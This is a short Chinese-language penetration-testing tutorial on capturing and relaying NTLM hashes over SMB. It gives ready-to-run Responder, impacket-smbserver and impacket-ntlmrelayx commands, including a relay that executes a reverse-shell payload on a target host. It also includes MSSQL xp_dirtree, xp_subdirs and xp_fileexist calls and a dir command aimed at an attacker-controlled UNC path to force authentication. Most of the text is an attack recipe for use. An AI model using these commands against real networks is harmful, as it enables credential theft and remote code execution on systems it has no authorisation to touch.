在渗透测试中,我们一旦能够将用户的哈希定向到我们的smbserver我们就可以滥用它们。主要有以下两种利用方式:1.窃取NTLM 2.中继NTLM。了解上述两种方式,将打开我们的视野,但在此之前,我们必须知道我们在什么场景下,可以将用户的hash定向到我们的smbserver中。所以本文章将讲述如何搭建哈希窃取和哈希中继攻击的服务器以及一些普遍的可以将hash定向到我们服务器的场景。
哈希窃取
使用responder工具,对内网进行监听,这通常需要一张可以开启混杂模式的网卡来完成。现在我们已经可以监听SMB服务了。我们将会窃取一切hash
responder -I <interface name>sudo impacket-smbserver share ./ -smb2support哈希中继攻击
使用impacket-ntlmrelayx可以监听445端口,然后对获取的hash进行转发,并夹带私货。下面的指令搭建了一个服务器,该服务器监听445端口并将获取的hash传递给10.10.110.146,并执行smb携带的命令。
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 -c '<reverse shellcode>'#-t是target的意思#-c是执行何种命令场景
知道如何搭建服务器了,我们就可以开始开拓想象力将hash传递给我们的服务器了。
1.responder窃取所有SMB广播
2.mssql,xp_dirtree,xp_fileexist,xp_subdir定向传递hash给中继服务器
3.系统dir命令传递hash
responder窃取所有SMB广播
responder在网络中的时候,会回应一切smb的请求,来诱导用户输入自己的账号密码,然后通过NTLM传递过来。之后我们就可以选择是窃取还是中继这个NTLM了,当然中继的话需要我们关闭responder的SMB服务,并搭建哈希中继服务器
cat /etc/responder/Responder.conf | grep 'SMB ='SMB = Offimpacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146mssql,xp_dirtree,xp_fileexist,xp_subdir定向传递hash给攻击服务器
mssql的命令可以发起smb请求,将这个请求发送给攻击服务器,我们就可以完成中继或者窃取了。
xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'系统dir系统传递hash给攻击服务器
系统命令dir可以直接完成smb请求,就是这么简单。
dir \\10.10.11.1\share
